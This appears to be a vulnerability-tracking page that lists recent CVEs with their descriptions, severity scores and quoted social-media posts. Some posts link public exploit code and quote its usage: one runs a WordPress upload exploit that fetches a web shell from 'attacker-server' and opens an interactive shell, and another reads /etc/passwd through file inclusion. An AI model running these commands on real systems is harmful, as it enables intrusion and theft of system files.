CVE-2025-41727

Overview

Beckhoff Automation
Beckhoff.Device.Manager.XAR

27 Jan 2026

Published

27 Jan 2026

Updated

CVSS v3.1

HIGH (7.8)

EPSS

0.02%

MITRE

KEV

Description

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

Statistics

2 Posts

Last activity: 14 hours ago

Fediverse

TheHackerWire @thehackerwire

🟠 CVE-2025-41727 - High (7.8)

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-41727/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

0
0
0
14h ago

CERT@VDE @certvde

#OT #Advisory VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager

The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
#CVE CVE-2025-41726, CVE-2025-41727, CVE-2025-41728

https://certvde.com/en/advisories/vde-2025-092/

#CSAF https://beckhoff.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2025-092.json

0
0
0
15h ago

CVE-2025-41726

Overview

Beckhoff Automation
Beckhoff.Device.Manager.XAR

27 Jan 2026

Published

27 Jan 2026

Updated

CVSS v3.1

HIGH (8.8)

EPSS

0.18%

MITRE

KEV

Description

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within privileged processes.

Statistics

2 Posts

Last activity: 14 hours ago

Fediverse

TheHackerWire @thehackerwire

🟠 CVE-2025-41726 - High (8.8)

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-41726/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

0
0
0
14h ago

CERT@VDE @certvde

#OT #Advisory VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager

The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
#CVE CVE-2025-41726, CVE-2025-41727, CVE-2025-41728

https://certvde.com/en/advisories/vde-2025-092/

#CSAF https://beckhoff.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2025-092.json

0
0
0
15h ago

CVE-2023-27532

Overview

Veeam Backup & Replication

10 Mar 2023

Published

21 Oct 2025

Updated

CVSS

Pending

EPSS

83.53%

MITRE

KEV

Description

Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.

Statistics

2 Posts
4 Interactions

Last activity: 14 hours ago

Bluesky

0xdf @0xdf.bsky.social

JobTwo from VulnLab now on HackTheBox is the sequel to Job from VulnLab. Phishing with Word macros, hMailServer database decryption with a known Blowfish key, password cracking, and CVE-2023-27532 in Veeam Backup & Replication for SYSTEM.

1
3
1
14h ago

CVE-2026-22200

Overview

Enhancesoft
osTicket

12 Jan 2026

Published

22 Jan 2026

Updated

CVSS v4.0

HIGH (8.7)

EPSS

4.28%

MITRE

KEV

Description

Enhancesoft osTicket versions 1.18.x prior to 1.18.3 and 1.17.x prior to 1.17.7 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the generated PDF can embed the contents of attacker-selected files from the server filesystem as bitmap images, allowing disclosure of sensitive local files in the context of the osTicket application user. This issue is exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled.

Statistics

1 Post
2 Interactions

Last activity: 16 hours ago

Fediverse

CERT-Bund @certbund

Die Detektion offen aus dem Internet erreichbarer osTicket-Systeme konnte verbessert werden. Damit sind uns aktuell rund 1.700 Systeme bei deutschen Netzbetreibern bekannt.

Davon laufen 22% mit der aktuellen Version 1.17.7 oder 1.18.3, welche die Schwachstelle CVE-2026-22200 schließt.

50% laufen mit veralteten Versionen 1.17.x bzw. 1.18.x.

28% laufen mit Versionen 1.9 bis 1.16, die nicht mehr vom Hersteller unterstützt werden.

0
2
0
16h ago

CVE-2024-9932

Overview

jurredeklijn
Wux Blog Editor

26 Oct 2024

Published

23 Jan 2026

Updated

CVSS v3.1

CRITICAL (9.8)

EPSS

81.47%

MITRE

KEV

Description

The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

Statistics

1 Post
1 Interaction

Last activity: 7 hours ago

Fediverse

Dark Web Informer :verified_paw: @DarkWebInformer

‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).

GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932

Type: 0-Click RCE Exploit

Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

0
1
0
7h ago

CVE-2025-2294

Overview

extendthemes
Kubio AI Page Builder

28 Mar 2025

Published

28 Mar 2025

Updated

CVSS v3.1

CRITICAL (9.8)

EPSS

54.35%

MITRE

KEV

Description

The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.

Statistics

1 Post
1 Interaction

Last activity: 7 hours ago

Fediverse

Dark Web Informer :verified_paw: @DarkWebInformer

‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

GitHub: https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker

CVSS: 9.8

Usage:

usage: exploit.py [-h] -u URL [-f FILE]

options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., https://example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)

Example:

python3 exploit.py -u https://example.com -f /etc/passwd

0
1
0
7h ago

CVE-2026-22794

Overview

appsmithorg
appsmith

12 Jan 2026

Published

13 Jan 2026

Updated

CVSS v3.1

CRITICAL (9.7)

EPSS

0.03%

MITRE

KEV

Description

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93.

Statistics

1 Post
1 Interaction

Last activity: 6 hours ago

Fediverse

Dark Web Informer :verified_paw: @DarkWebInformer

‼️ CVE-2026-22794: Appsmith Password Reset Account Takeover via Origin Header Injection

GitHub: https://github.com/MalikHamza7/CVE-2026-22794-POC

CVSS: 9.6

Writeup: https://www.resecurity.com/blog/article/cve-2026-22794-changing-the-origin-header-to-take-over-appsmith-accounts

0
1
0
6h ago

CVE-2025-10966

Overview

curl
curl

07 Nov 2025

Published

10 Nov 2025

Updated

CVSS

Pending

EPSS

0.02%

MITRE

KEV

Description

curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl from detecting MITM attackers and more.

Statistics

1 Post

Last activity: 15 hours ago

Bluesky

Lambda Watchdog @lambdawatchdog.bsky.social

🔍 Lambda Watchdog detected that CVE-2025-10966 is no longer present in latest AWS Lambda base image scans. https://github.com/aws/aws-lambda-base-images/issues/371 #AWS #Lambda #Security #CVE #DevOps #SecOps

0
0
0
15h ago

CVE-2026-24832

Overview

ixray-team
ixray-1.6-stcop

27 Jan 2026

Published

27 Jan 2026

Updated

CVSS v3.1

CRITICAL (9.8)

EPSS

Pending

MITRE

KEV

Description

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

Statistics

1 Post

Last activity: 10 hours ago

Fediverse

TheHackerWire @thehackerwire

🔴 CVE-2026-24832 - Critical (9.8)

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24832/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

0
0
0
10h ago

CVE-2026-24841

Overview

Dokploy
dokploy

28 Jan 2026

Published

28 Jan 2026

Updated

CVSS v3.1

CRITICAL (9.9)

EPSS

Pending

MITRE

KEV

Description

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameters are directly interpolated into shell commands without sanitization, allowing authenticated attackers to execute arbitrary commands on the host server. Version 0.26.6 fixes the issue.

Statistics

1 Post

Last activity: 1 hour ago

Fediverse

TheHackerWire @thehackerwire

🔴 CVE-2026-24841 - Critical (9.9)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24841/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

0
0
0
1h ago